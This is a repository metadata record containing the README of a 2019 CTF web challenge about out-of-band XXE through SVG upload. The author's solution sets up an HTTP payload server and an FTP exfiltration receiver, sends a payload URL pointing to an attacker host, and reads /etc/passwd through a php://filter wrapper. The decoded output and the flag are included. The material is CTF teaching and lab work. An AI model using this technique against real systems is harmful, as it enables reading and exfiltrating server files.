{"id":18688769,"url":"https://github.com/noraj/sigsegv2.webserver_3","last_synced_at":"2025-11-08T04:30:29.154Z","repository":{"id":55307935,"uuid":"225727261","full_name":"noraj/SigSegV2.webserver_3","owner":"noraj","description":"A web challenge that was available during SigSegV2 CTF (2019)","archived":false,"fork":false,"pushed_at":"2021-01-05T17:28:27.000Z","size":385,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-12-28T01:26:21.014Z","etag":null,"topics":["challenge","ctf","file-read","php","rtfm","sigsegv2","svg","web","xxe"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/noraj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-12-03T22:10:59.000Z","updated_at":"2024-01-17T17:51:41.000Z","dependencies_parsed_at":"2022-08-14T20:22:12.901Z","dependency_job_id":null,"html_url":"https://github.com/noraj/SigSegV2.webserver_3","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_3","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_3/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_3/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_3/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/noraj","download_url":"https://codeload.github.com/noraj/SigSegV2.webserver_3/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239549136,"owners_count":19657534,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["challenge","ctf","file-read","php","rtfm","sigsegv2","svg","web","xxe"],"created_at":"2024-11-07T10:38:17.234Z","updated_at":"2025-11-08T04:30:29.117Z","avatar_url":"https://github.com/noraj.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XXE OOB via SVG rasterization (local file read)\n\n## Version\n\nDate        | Author                  | Contact               | Version | Comment\n---         | ---                     | ---                   | ---     | ---\n03/11/2019  | noraj (Alexandre ZANNI) | noraj#0833 on discord | 1.0     | Document creation\n\nInformation displayed for CTF players:\n\n+ **Name of the challenge** / **Nom du challenge**: `Image Checker 1`\n+ **Category** / **Catégorie**: `Web`\n+ **Internet**: not needed\n+ **Difficulty** / **Difficulté**: hard / difficile\n\n### Description\n\n```\nThis image checker is so handy but I fear the worst.\n\nFlag format: sigsegv{flag}\n\nauthor: [noraj](https://pwn.by/noraj/)\n```\n\n### Hints\n\n- Hint1: SVG\n- Hint2: XXE\n\n## Integration\n\nThis challenge require a Docker Engine and Docker Compose.\n\nBuilds, (re)creates, starts, and attaches to containers for a service:\n\n```\n$ docker-compose up --build webserver3\n```\n\nAdd `-d` if you want to detach the container.\n\n## Solving\n\n### Author solution\n\nI was inspired by [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) WU.\n\n1. The app ask for a SVG.\n2. Other file types seem to be refused.\n3. Let's pick a legit svg and sent it to see what happens. Alternatively just load `view.php` without parameter.\n4. The app seems to parse info from the file.\n5. Since SVG is a XML let's try a XXE attack.\n6. We can't see any errors, let's try a XXE OOB.\n7. Let's start a HTTP server to deliver payloads (`xxe.svg` \u0026 `xxe.xml`): `python -m http.server --bind 192.168.1.84 8080`.\n8. Let's start a FTP OOB extraction receiver ([230-OOB](https://github.com/lc/230-OOB)): `python 230.py 2121`.\n9. Send the payload: http://x.x.x.x:42421/view.php?svg=http://192.168.1.84:8080/xxe.svg. (see `xxe.svg` \u0026 `xxe.xml`)\n10. Try to read some files on the FS, the flag is on the last line of `/etc/passwd`. Change the `data` paylaod in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=/etc/passwd\n    ```\n11. On the FTP server receive the base64 string and decode it:\n    ```\n    $ printf %s 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYXNoCmJpbjp4OjE6MTpiaW46L2Jpbjovc2Jpbi9ub2xvZ2luCmRhZW1vbjp4OjI6MjpkYWVtb246L3NiaW46L3NiaW4vbm9sb2dpbgphZG06eDozOjQ6YWRtOi92YXIvYWRtOi9zYmluL25vbG9naW4KbHA6eDo0Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3NiaW4vbm9sb2dpbgpzeW5jOng6NTowOnN5bmM6L3NiaW46L2Jpbi9zeW5jCnNodXRkb3duOng6NjowOnNodXRkb3duOi9zYmluOi9zYmluL3NodXRkb3duCmhhbHQ6eDo3OjA6aGFsdDovc2Jpbjovc2Jpbi9oYWx0Cm1haWw6eDo4OjEyOm1haWw6L3Zhci9zcG9vbC9tYWlsOi9zYmluL25vbG9naW4KbmV3czp4Ojk6MTM6bmV3czovdXNyL2xpYi9uZXdzOi9zYmluL25vbG9naW4KdXVjcDp4OjEwOjE0OnV1Y3A6L3Zhci9zcG9vbC91dWNwcHVibGljOi9zYmluL25vbG9naW4Kb3BlcmF0b3I6eDoxMTowOm9wZXJhdG9yOi9yb290Oi9zYmluL25vbG9naW4KbWFuOng6MTM6MTU6bWFuOi91c3IvbWFuOi9zYmluL25vbG9naW4KcG9zdG1hc3Rlcjp4OjE0OjEyOnBvc3RtYXN0ZXI6L3Zhci9zcG9vbC9tYWlsOi9zYmluL25vbG9naW4KY3Jvbjp4OjE2OjE2OmNyb246L3Zhci9zcG9vbC9jcm9uOi9zYmluL25vbG9naW4KZnRwOng6MjE6MjE6Oi92YXIvbGliL2Z0cDovc2Jpbi9ub2xvZ2luCnNzaGQ6eDoyMjoyMjpzc2hkOi9kZXYvbnVsbDovc2Jpbi9ub2xvZ2luCmF0Ong6MjU6MjU6YXQ6L3Zhci9zcG9vbC9jcm9uL2F0am9iczovc2Jpbi9ub2xvZ2luCnNxdWlkOng6MzE6MzE6U3F1aWQ6L3Zhci9jYWNoZS9zcXVpZDovc2Jpbi9ub2xvZ2luCnhmczp4OjMzOjMzOlggRm9udCBTZXJ2ZXI6L2V0Yy9YMTEvZnM6L3NiaW4vbm9sb2dpbgpnYW1lczp4OjM1OjM1OmdhbWVzOi91c3IvZ2FtZXM6L3NiaW4vbm9sb2dpbgpwb3N0Z3Jlczp4OjcwOjcwOjovdmFyL2xpYi9wb3N0Z3Jlc3FsOi9iaW4vc2gKY3lydXM6eDo4NToxMjo6L3Vzci9jeXJ1czovc2Jpbi9ub2xvZ2luCnZwb3BtYWlsOng6ODk6ODk6Oi92YXIvdnBvcG1haWw6L3NiaW4vbm9sb2dpbgpudHA6eDoxMjM6MTIzOk5UUDovdmFyL2VtcHR5Oi9zYmluL25vbG9naW4Kc21tc3A6eDoyMDk6MjA5OnNtbXNwOi92YXIvc3Bvb2wvbXF1ZXVlOi9zYmluL25vbG9naW4KZ3Vlc3Q6eDo0MDU6MTAwOmd1ZXN0Oi9kZXYvbnVsbDovc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovOi9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDo4Mjo4MjpMaW51eCBVc2VyLCwsOi9ob21lL3d3dy1kYXRhOi9zYmluL25vbG9naW4KZmxhZzp4Ojk5OTk6OTk5OTpzaWdzZWd2e1MwX3lvdV80cmVfNF9YWEVfbTRzdDNyX3QwMH06L2hvbWUvZmxhZzovc2Jpbi9ub2xvZ2luCm5vcmFqOng6MTMzNzoxMzM3OkxpbnV4IFVzZXIsLCw6L2hvbWUvbm9yYWo6L2Jpbi90cnVlCg==' | base64 -d | tail -2 | head -1 | cut -d ':' -f 5\n    ```\n\nLegit SVG example: https://upload.wikimedia.org/wikipedia/commons/6/6a/Godot_icon.svg\n\n## Flag\n\n`sigsegv{S0_you_4re_4_XXE_m4st3r_t00}`\n\n## SigSegV2\n\nA web challenge that was available during SigSegV2 CTF (2019).\n\n5 teams on 36 flaged this challenge.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_3","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_3","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_3/lists"}